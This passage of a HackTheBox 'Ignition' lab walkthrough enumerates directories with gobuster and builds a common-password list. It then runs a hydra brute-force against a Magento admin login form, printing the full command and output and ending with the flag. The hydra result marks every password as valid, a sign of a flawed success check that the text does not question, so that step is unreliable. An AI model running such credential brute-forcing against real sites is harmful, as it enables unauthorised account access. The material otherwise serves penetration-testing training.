 /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
 /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

root@htb:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@htb:~$ which gobuster
 /usr/bin/gobuster

root@htb:~$ gobuster dir -u http://ignition.htb -w directory-list-2.3-small.txt
 /contact              (Status: 200) [Size: 28673]
 /home                 (Status: 200) [Size: 25802]
 /media                (Status: 301) [Size: 185] [--> http://ignition.htb/media/]
 /0                    (Status: 200) [Size: 25803]
 /catalog              (Status: 302) [Size: 0] [--> http://ignition.htb/]
 /static               (Status: 301) [Size: 185] [--> http://ignition.htb/static/]
 /admin                (Status: 200) [Size: 7092]
 /Home                 (Status: 301) [Size: 0] [--> http://ignition.htb/home]
 ...
 
 * the vhost represents virtual host routing
 * the -w represents the path to the wordlist
 * the -u represents the target URL
 * the --append-domain option is only required when conducting subdomain enumeration NOT directory brute forcing
#conduct OSINT
root@htb:~$ BROWSER > googleSearch
 search: magento
 
 * Magento is a free, open-source e-commerce platform that helps businesses create and manage online stores. It's written in PHP and uses the Open Software Licens
 
root@htb:~$ BROWSER > googleSearch
 search: magento default credentials
  username: admin

root@htb:~$ BROWSER > googleSearch
 search: most common password list
 ...

root@htb:~$ nano commonPWs.txt
 admin123
 root123
 password1
 administrator1
 changeme1
 password123
 qwerty123
 administrator123
 changeme123
 
#brute force

root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL:ignition/admin
 
 Requests
 ...
 POST /admin HTTP/1.1
 Host: ignition.htb
 Content-Length: 78
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://ignition.htb
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://ignition.htb/admin
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: admin=cd4juor0dcuu0pid746li0jdqr
 Connection: close

 form_key=vEO8avkyPjmLQrhI&login%5Busername%5D=admin&login%5Bpassword%5D=qerty1

root@htb:~$ hydra -l admin -P commonPWs.txt ignition.htb http-post-form "/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302"
 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-22 07:31:36
 [DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:1/p:9), ~1 try per task
 [DATA] attacking http-post-form://ignition.htb:80/admin:login%5Busername%5D=^USER^&login%5Bpassword%5D=^PASS^:S=302
 [80][http-post-form] host: ignition.htb   login: admin   password: root123
 [80][http-post-form] host: ignition.htb   login: admin   password: changeme123
 [80][http-post-form] host: ignition.htb   login: admin   password: password123
 [80][http-post-form] host: ignition.htb   login: admin   password: changeme1
 [80][http-post-form] host: ignition.htb   login: admin   password: administrator1
 [80][http-post-form] host: ignition.htb   login: admin   password: administrator123
 [80][http-post-form] host: ignition.htb   login: admin   password: admin123
 [80][http-post-form] host: ignition.htb   login: admin   password: password1
 [80][http-post-form] host: ignition.htb   login: admin   password: qwerty123
 1 of 1 target successfully completed, 9 valid passwords found

 * the user=^USER^&pass=^PASS^ represents the form parameter
    - the specific format can be retrieved via Burp Suite or through the Browser's dev tools
    - the S=302 is used to look for a successful login indicated by the HTTP status code 302
       - Looking for a successful login indicated by the HTTP status code 302 is 
         necessary because, in many web applications, successful authentication 
         does not directly return a 200 OK response. Instead, it often redirects 
         the user to a different page after login, which is signified by 
         the 302 Found status code.
         
  * Congratulations, your flag is: 797d6c988d9dc5865e010b9410f247e0
Previous05.THREE (AWS S3 BUCKET)Next07.BIKE (SSTI)

Last updated 15 days ago